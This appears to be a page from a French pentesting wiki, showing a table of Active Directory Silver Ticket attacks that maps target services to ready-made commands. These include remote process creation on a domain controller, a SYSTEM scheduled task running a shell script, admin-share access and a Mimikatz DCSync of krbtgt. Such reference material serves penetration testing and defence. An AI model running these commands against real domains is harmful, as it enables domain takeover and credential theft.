Bebzounette
Rechercher…
Bebzounette
Les Bebzounettes
A propos de l'auteur
Active Directory
Reconnaissance
Mouvement Lateral
🚧
Persistance et Exfiltration
Golden Ticket
Silver Ticket
Skeleton Key
DSRM
Custom SSP
AdminSDHolder
🚧
Cross Trust Attack
Références
Failles Système
🚧
Windows
🚧
Linux
🚧
Mobile & IOT
Failles Web
CheckList & Méthodologie
🚧
Pentest API
🚧
Wordpress
🚧
Jenkins
🚧
IIS Server
Failles Applicative
Buffer-Overflow
Client Lourd /Thick Client
Méthodologie Pentest Client Lourd
Social Engineering
Création d'un serveur de phishing
Sténographie
Sténographie basique
Wireless Security
WIFI
🚧
ZIGBEE
🚧
ZWAVE
GNU-RADIO
Failles Réseaux
Modèle OSI & Adressage IPV4
🚧
DOS & DDOS
VOIP
Failles Physique
🚧
Lock Picking
Matériels
Accès physique à un ordinateur
Forensic
Outils de Forensic
Information gathering
Scans
Services
Echo - 7
FTP - 21
SSH - 22
Telnet - 23
SMTP - 25/465/587
Whois - 43
Finger - 79
POP3 - 110
NTP - 123
MSRPC - 135/593
IMAP - 143
SMB - 445
RDP -3389
References
Github Repos
Repos Github
Contact
Propulsé par GitBook
Silver Ticket

Service à cibler lors de demande de TGS :

Type de service
Service Silver Ticket
Attaques
SWMI
HOST + RPCSS
wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"
Powershell Remoting
HTTP + WSMAN
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
WinRM
HTTP + WSMAN
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
Scheduled Tasks
HOST
schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"
Windows File Share (CIFS)
CIFS
dir \dc01\c$
LDAP operations including Mimikatz DCSync
LDAP
lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt
Windows Remote Server Administration Tools
RPCSS + LDAP + CIFS
Précédent
Golden Ticket
Suivant
Skeleton Key
Dernière mise à jour 9mo ago
Copier le lien